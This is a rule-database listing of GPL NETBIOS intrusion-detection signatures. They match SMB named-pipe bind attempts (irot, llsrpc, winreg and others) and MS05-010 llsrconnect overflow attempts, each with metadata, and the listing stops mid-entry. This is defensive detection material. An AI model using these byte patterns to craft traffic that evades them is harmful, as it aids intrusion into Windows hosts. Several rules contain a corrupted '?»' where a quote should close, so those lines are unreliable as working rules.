Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103248

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103248; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103249

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103249; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103250

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103250; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103251

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS irot unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?»; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103251; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)
`

Name : SMB-DS irot unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103123

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103123; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103122

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103122; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103125

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode little endian overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103125; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode little endian overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103124

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrconnect unicode overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103124; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrconnect unicode overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103106

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103106; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103094

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|llsrpc|00|"; within:8; distance:78; nocase; classtype:protocol-command-decode; sid:2103094; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103107

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103107; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103108

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103108; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103095

#alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:78; nocase; classtype:protocol-command-decode; sid:2103095; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103109

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS llsrpc unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103109; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS llsrpc unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103170

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103170; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103171

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS msqueue unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103171; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS msqueue unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102934

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102934; rev:6; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 6

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102930

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"|5C|nddeapi|00|"; within:9; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102930; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102935

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode bind attempt"; flow:established,to_server; flowbits:isset,smb.tree.create.nddeapi; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-10,relative,from_beginning; content:"|05|"; distance:4; within:1; content:"|0B|"; within:1; distance:1; content:" 2_/&|C1|v|10 B5|I|07|M|07 86 19 DA|"; within:16; distance:29; flowbits:set,smb.tree.bind.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102935; rev:7; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 7

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2102931

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS nddeapi unicode create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB|A2|"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"|5C 00|n|00|d|00|d|00|e|00|a|00|p|00|i|00 00 00|"; within:18; distance:78; nocase; flowbits:set,smb.tree.create.nddeapi; reference:bugtraq,11372; reference:cve,2004-0206; classtype:protocol-command-decode; sid:2102931; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS nddeapi unicode create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,11372|cve,2004-0206

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103210

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103210; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103211

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103211; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103212

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103212; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103213

alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"GPL NETBIOS SMB-DS winreg unicode little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103213; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB-DS winreg unicode little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103394

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator little endian bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,!&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103394; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator little endian bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103395

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB ISystemActivator unicode bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB%"; within:5; distance:3; byte_test:1,&,128,6,relative; content:"&|00|"; within:2; distance:56; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00|F"; within:16; distance:29; flowbits:set,dce.isystemactivator.bind; flowbits:noalert; classtype:protocol-command-decode; sid:2103395; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB ISystemActivator unicode bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

